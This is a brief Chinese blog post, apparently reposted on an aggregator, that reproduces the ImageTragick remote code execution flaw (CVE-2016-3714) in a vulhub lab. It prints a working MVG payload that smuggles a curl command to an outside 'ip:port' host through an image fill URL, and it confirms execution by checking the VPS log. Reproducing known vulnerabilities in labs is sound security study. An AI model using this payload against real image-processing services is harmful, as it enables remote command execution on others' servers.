Imagetragick RCE(CVE-2016–3714)复现

Posted jinqi520

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Imagetragick RCE(CVE-2016–3714)复现相关的知识,希望对你有一定的参考价值。

CVE-2016–3714:

闲着没事突然想起这个洞来,借用vulhub复现一下

poc有很多:https://github.com/ImageTragick/PoCs

我用的

技术图片

 

 

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://127.0.0.1/oops.jpg"|curl "ip:port/image)‘
pop graphic-context

 

图片上传后,vps查看日志
技术图片

 

以上是关于Imagetragick RCE(CVE-2016–3714)复现的主要内容,如果未能解决你的问题,请参考以下文章